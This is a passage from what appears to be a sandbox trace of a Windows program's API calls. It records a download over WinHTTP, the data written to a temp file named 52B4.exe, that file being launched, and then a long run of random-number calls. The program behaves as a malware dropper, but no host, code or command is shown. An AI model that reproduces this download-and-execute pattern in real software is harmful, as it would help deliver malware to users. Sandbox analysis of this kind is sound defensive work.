hRequest=0x3eeb880, lpBuffer=0x9faf040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9faf040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0140.533] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x334000) returned 0x5e50040 [0140.601] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6181840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6181840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0140.601] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x336800) returned 0x9c80040 [0140.709] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fb4040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fb4040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0140.710] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x339000) returned 0x5e50040 [0140.803] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6186840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6186840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0140.804] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x33b800) returned 0x9c80040 [0141.002] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fb9040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fb9040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0141.002] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x33e000) returned 0x5e50040 [0141.143] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x618b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x618b840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0141.143] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x340800) returned 0x9c80040 [0141.215] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fbe040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fbe040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0141.216] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x343000) returned 0x5e50040 [0141.343] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6190840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6190840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0141.344] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x345800) returned 0x9c80040 [0141.461] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fc3040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fc3040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0141.463] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x348000) returned 0x5e50040 [0141.521] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6195840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6195840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0141.521] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x34a800) returned 0x9c80040 [0141.606] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fc8040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fc8040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0141.644] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x34d000) returned 0x5e50040 [0141.727] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x619a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x619a840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0141.727] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x34f800) returned 0x9c80040 [0141.789] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fcd040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fcd040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0141.791] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x352000) returned 0x5e50040 [0142.302] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x619f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x619f840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0142.303] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x354800) returned 0x9c80040 [0142.491] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fd2040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fd2040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0142.491] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x357000) returned 0x5e50040 [0142.648] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x61a4840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x61a4840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0142.648] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x359800) returned 0x9c80040 [0142.724] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fd7040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fd7040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0142.726] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x35c000) returned 0x5e50040 [0142.890] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x61a9840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x61a9840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0142.890] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x35e800) returned 0x9c80040 [0142.956] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fdc040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fdc040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0142.956] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x361000) returned 0x5e50040 [0143.072] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x61ae840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x61ae840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0143.072] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x363800) returned 0x9c80040 [0143.134] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fe1040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fe1040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0143.135] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x366000) returned 0x5e50040 [0143.265] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x61b3840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x61b3840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0143.266] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x368800) returned 0x9c80040 [0143.334] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fe6040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fe6040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0143.334] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x36b000) returned 0x5e50040 [0143.442] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x61b8840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x61b8840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0143.443] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x36d800) returned 0x9c80040 [0143.526] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9feb040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9feb040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0143.526] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x370000) returned 0x5e50040 [0143.605] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x61bd840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x61bd840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0143.606] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x372800) returned 0x9c80040 [0143.718] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ff0040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ff0040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0143.718] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x375000) returned 0x5e50040 [0143.776] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x61c2840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x61c2840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0143.777] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x377800) returned 0x9c80040 [0143.835] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ff5040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ff5040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0143.836] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x37a000) returned 0x5e50040 [0143.921] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x61c7840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x61c7840*, lpdwNumberOfBytesRead=0x75df598*=0x1da8) returned 1 [0143.925] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x37c800) returned 0x9c80040 [0143.998] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ff95e8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ff95e8*, lpdwNumberOfBytesRead=0x75df598*=0x0) returned 1 [0144.000] VirtualAlloc (lpAddress=0x0, dwSize=0x3795a8, flAllocationType=0x3000, flProtect=0x4) returned 0x5e50000 [0144.105] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9c80040) returned 1 [0144.151] WinHttpCloseHandle (hInternet=0x3eeb880) returned 1 [0144.151] WinHttpCloseHandle (hInternet=0x3fa9e40) returned 1 [0144.151] WinHttpCloseHandle (hInternet=0x3ea9ba0) returned 1 [0144.152] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d43f0) returned 0x10c [0144.152] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d43f0) returned 1 [0144.153] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d4390) returned 0x50 [0144.153] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d4390) returned 1 [0144.153] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d4370) returned 0x13 [0144.153] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d4370) returned 1 [0144.153] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x210) returned 0x9a80080 [0144.153] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x210) returned 0x9a802a0 [0144.153] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x9a802a0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0144.154] lstrcatW (in: lpString1="", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" [0144.154] GetTempFileNameW (in: lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x9a802a0 | out: lpTempFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\52b4.tmp")) returned 0x52b4 [0144.175] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\52b4.tmp")) returned 1 [0144.175] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.tmp") returned 45 [0144.175] lstrcatW (in: lpString1="", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4" [0144.175] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a802a0) returned 0x210 [0144.176] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a802a0) returned 1 [0144.176] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x9a802a0 [0144.176] lstrcatW (in: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4", lpString2=".exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe" [0144.176] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a802a0) returned 0x12 [0144.176] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a802a0) returned 1 [0144.176] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\52b4.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14d8 [0144.176] WriteFile (in: hFile=0x14d8, lpBuffer=0x5e50000*, nNumberOfBytesToWrite=0x3795a8, lpNumberOfBytesWritten=0x75df5f8, lpOverlapped=0x0 | out: lpBuffer=0x5e50000*, lpNumberOfBytesWritten=0x75df5f8*=0x3795a8, lpOverlapped=0x0) returned 1 [0144.291] CloseHandle (hObject=0x14d8) returned 1 [0144.745] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName=0x0, lpCommandLine="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpStartupInfo=0x75df620*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x75df600, hNewToken=0x0 | out: lpProcessInformation=0x75df600*(hProcess=0x41c, hThread=0x14d8, dwProcessId=0xeec, dwThreadId=0xef0), hNewToken=0x0) returned 1 [0144.832] CloseHandle (hObject=0x41c) returned 1 [0144.832] CloseHandle (hObject=0x14d8) returned 1 [0144.832] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1c0803da [0144.832] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x8e) returned 0x9a802a0 [0144.832] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43406ae8 [0144.832] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6733a698 [0144.832] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1897e74b [0144.832] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c7a75b2 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ee23308 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c10330a [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x20936848 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x12137ce [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6196de61 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x317d1d2a [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c512782 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x20ddb40f [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5904400f [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x59f38ab4 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3ebd139a [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7307959f [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71b70b1b [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7f9ec093 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1d875246 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f63b92e [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x142102ce [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3623b741 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5c162be4 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x33e43f64 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6ece9b27 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x162eae6 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7f86e3f0 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a2c2402 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64fd76d7 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x583b90af [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6ff79b50 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x29fff5a1 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x18112eef [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x29ad6c18 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5edc9eff [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3a93de9c [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c5e14d7 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1a26ddc1 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1599625b [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x619a58c3 [0144.833] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7585bbf [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c81f727 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4fce8708 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e5e4905 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x41314f17 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5689b170 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3a3662d4 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ca26455 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17fa27ff [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x306956b1 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x30532c8e [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4c4f0367 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7f9bbb6d [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x122d34bb [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e0aa4b6 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b0802ec [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6a88701c [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7d8dea59 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x447494c2 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d3bb589 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b632257 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x52da9342 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xd61c895 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x181352f3 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7413b93c [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x22c84d [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2040bf26 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5164ba15 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6df985f1 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2fcd8a16 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x682d0cd3 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51366fc3 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b159f85 [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d87007a [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x46eaea3e [0144.834] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x396152e4 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9f1587 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x19651fa7 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57ec2e89 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1930ac82 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66cb64f0 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x547370aa [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x41507b27 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5f1f315f [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1eabc483 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x54186926 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x34445abc [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x16cf4463 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3db37ea9 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ea42aaa [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3ac90b08 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6ff7cf86 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1ed662fb [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x670b7b97 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7448f118 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x679c9ddd [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9392de1 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x228bb5f2 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x772cfa7c [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43b41c2e [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4f209217 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7a4a0899 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d56047e [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c65073c [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5f4424de [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: 